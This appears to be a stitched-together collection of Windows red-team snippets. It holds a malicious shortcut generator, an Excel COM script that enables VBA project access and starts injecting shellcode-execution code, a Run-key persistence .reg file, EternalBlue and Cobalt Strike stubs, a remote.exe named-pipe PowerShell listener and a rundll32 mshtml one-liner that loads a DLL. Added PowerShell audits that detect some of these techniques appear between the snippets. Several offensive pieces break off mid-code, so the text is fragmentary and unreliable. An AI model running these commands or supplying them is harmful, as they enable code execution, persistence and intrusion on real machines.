# PowerShell: build a .lnk that launches cmd.exe with its argument string read from a text file.
# Get-Content returns one string per line; string + array concatenation joins them with spaces ($OFS).
$file = Get-Content "c:\test\test.txt"
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("c:\test\test.lnk")
$Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21"   # icon index 21 from shell32.dll
$Shortcut.Arguments = ' ' + $file
$Shortcut.Save()
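An added check, not part of the gist above, that reads shortcuts back through the same WScript.Shell interface and flags the pattern this generator produces: a LOLBin target (cmd.exe, powershell.exe, mshta.exe, rundll32.exe, ...) carrying an argument string. Explorer's Properties dialog shows only a limited prefix of a long Target string, which is what makes argument smuggling via .lnk effective; the COM object returns the full Arguments value. The search roots in $roots and the list of flagged binaries are assumptions for the example.

```powershell
# Added example: inspect .lnk files for LOLBin targets carrying arguments.
function Get-LnkTarget {
    param([Parameter(Mandatory)][string]$Path)   # full path to an existing .lnk
    $wsh = New-Object -ComObject WScript.Shell
    $lnk = $wsh.CreateShortcut($Path)            # CreateShortcut opens an existing .lnk as well as creating one
    # Assumed list of launchers worth flagging; extend to taste.
    $lolbins = '\\(cmd|powershell|pwsh|mshta|rundll32|wscript|cscript|regsvr32)\.exe$'
    [pscustomobject]@{
        Path         = $Path
        TargetPath   = $lnk.TargetPath
        Arguments    = $lnk.Arguments
        IconLocation = $lnk.IconLocation
        ArgLength    = $lnk.Arguments.Length
        Suspicious   = ($lnk.TargetPath -match $lolbins) -and ($lnk.Arguments.Length -gt 0)
    }
}

# Assumed drop locations to sweep; adjust for the host being examined.
$roots = "$env:USERPROFILE\Desktop",
         "$env:APPDATA\Microsoft\Windows\Start Menu",
         "$env:TEMP"

Get-ChildItem -Path $roots -Filter *.lnk -Recurse -ErrorAction SilentlyContinue |
    ForEach-Object { Get-LnkTarget -Path $_.FullName } |
    Where-Object Suspicious |
    Format-List Path, TargetPath, ArgLength, Arguments
```

Run it in the user context whose shortcuts you want to inspect; TargetPath comes back with environment variables already expanded, so the regex matches the generator's "%SystemRoot%\system32\cmd.exe" target.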

#!/bin/bash
# bash: generate a random alphanumeric string from /dev/urandom
#
# LC_ALL=C keeps tr byte-oriented, so random bytes are not rejected as invalid
# multibyte characters under a UTF-8 locale.
export LC_ALL=C

# 32 characters, upper and lower case letters plus digits
NEW_UUID=$(tr -dc 'a-zA-Z0-9' < /dev/urandom | fold -w 32 | head -n 1)
echo "$NEW_UUID"

# 32 characters, lower case letters plus digits only
tr -dc 'a-z0-9' < /dev/urandom | fold -w 32 | head -n 1

// JScript: drive Excel over COM to inject a VBA module and run it without a document on disk.
var objExcel = new ActiveXObject("Excel.Application");
objExcel.Visible = false;
var WshShell = new ActiveXObject("WScript.Shell");
var Application_Version = objExcel.Version; // auto-detect the installed Office version, e.g. "16.0"
// "Trust access to the VBA project object model" must be on or VBProject access fails; it lives in HKCU, so no admin needed.
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
var objWorkbook = objExcel.Workbooks.Add();
var xlmodule = objWorkbook.VBProject.VBComponents.Add(1); // 1 = vbext_ct_StdModule
// Sample Shell Code Execution Documented Here: https://www.scriptjunkie.us/2012/01/direct-shellcode-execution-in-ms-office-macros/
var strCode = 'Private Declare Function CreateThread Lib "kernel32" (ByVal Npdrhkbff As Long, ByVal Drcunuy As Long, ByVal Ache As Long, Wiquwzp As Long, ByVal Ltdplqkqj As Long, Xsawbea As Long) As Long\n';

Windows Registry Editor Version 5.00

; Persistence: registers "Rundll32.exe SHELL32.DLL,ShellExec_RunDLL C:\ProgramData\test.exe" as the
; (Default) value of the per-machine Run key (writing HKLM requires administrative rights).
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
@="Rundll32.exe SHELL32.DLL,ShellExec_RunDLL \"C:\\ProgramData\\test.exe\""
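An added audit, not part of either gist, for the two registry settings the Excel JScript snippet and the .reg file above rely on: it enumerates every Office version under HKCU and reports AccessVBOM where it is set, and reads every value of the per-machine and per-user Run keys, including the unnamed (Default) value the .reg file writes, flagging rundll32/ShellExec_RunDLL launchers and payloads under ProgramData, Temp or AppData. The Office application list and the "suspicious" pattern are heuristics chosen for the example.

```powershell
# Added example: audit AccessVBOM (VBA project access) and Run-key persistence.
function Get-OfficeAccessVbom {
    $base = 'HKCU:\Software\Microsoft\Office'
    Get-ChildItem -Path $base -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -match '^\d+\.\d+$' } |       # version subkeys such as 16.0
        ForEach-Object {
            $ver = $_.PSChildName
            foreach ($app in 'Excel', 'Word', 'PowerPoint') {        # assumed set of apps to check
                $sec = "$base\$ver\$app\Security"
                $v = (Get-ItemProperty -Path $sec -Name AccessVBOM -ErrorAction SilentlyContinue).AccessVBOM
                if ($null -ne $v) {
                    [pscustomobject]@{ Version = $ver; App = $app; AccessVBOM = $v; Enabled = ($v -eq 1) }
                }
            }
        }
}

function Get-RunKeyEntries {
    $keys = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
            'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
    # Heuristic pattern for the example: LOLBin launcher or a payload in a writable drop directory.
    $pattern = '(?i)rundll32.*ShellExec_RunDLL|\\ProgramData\\|\\Temp\\|\\AppData\\'
    foreach ($k in $keys) {
        $item = Get-Item -Path $k -ErrorAction SilentlyContinue
        if (-not $item) { continue }
        foreach ($name in $item.GetValueNames()) {                   # '' is the (Default) value
            $cmd = [string]$item.GetValue($name)
            [pscustomobject]@{
                Key        = $k
                Name       = if ($name -eq '') { '(Default)' } else { $name }
                Command    = $cmd
                Suspicious = [bool]($cmd -match $pattern)
            }
        }
    }
}

Get-OfficeAccessVbom | Format-Table -AutoSize
Get-RunKeyEntries | Where-Object Suspicious | Format-Table -AutoSize
```

Reading HKLM\...\Run needs no elevation, so the sweep runs as a normal user; AccessVBOM is per-user, so run it under each account of interest.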

using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
Create Your Strong Name Key -> key.snk

#!/usr/bin/python
from impacket import smb
from struct import pack
import os
import sys
import socket
'''
EternalBlue exploit for Windows 7/2008 by sleepya
The exploit might FAIL and CRASH a target system (depending on what is overwritten)

#!/usr/bin/python
from impacket import smb
from struct import pack
import os
import sys
import socket
'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depending on what is overwritten)

# Scripted Web Delivery (Stageless)
#
# This Aggressor script demonstrates some of the new APIs in Cobalt Strike 3.7.
# setup our stageless PowerShell Web Delivery attack
sub setup_attack {
    local('%options $script $url $arch');
    %options = $3;
    # get the arch right.

# Command to run on the victim (remote.exe ships with the Windows Debugging Tools)
# This will establish a PowerShell listener over the "pwnme" named pipe
remote /S "powershell.exe" pwnme

# Commands to run on an attacker system, if remote.exe is desired on the client (versus developing your own SMB pipe client)
# runas /netonly supplies credentials for the SMB session to the target; the pipe is reached over SMB (TCP 445)
runas /netonly /user:[Domain|Hostname\Username] "cmd"
remote /C [Hostname\IP] "pwnme"

REM rundll32 mshtml.dll HTA one-liner command:
REM RunHTMLApplication evaluates the javascript: URL; RegisterXLL loads the file as an Excel add-in (a DLL), so the .log extension is cosmetic.
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close();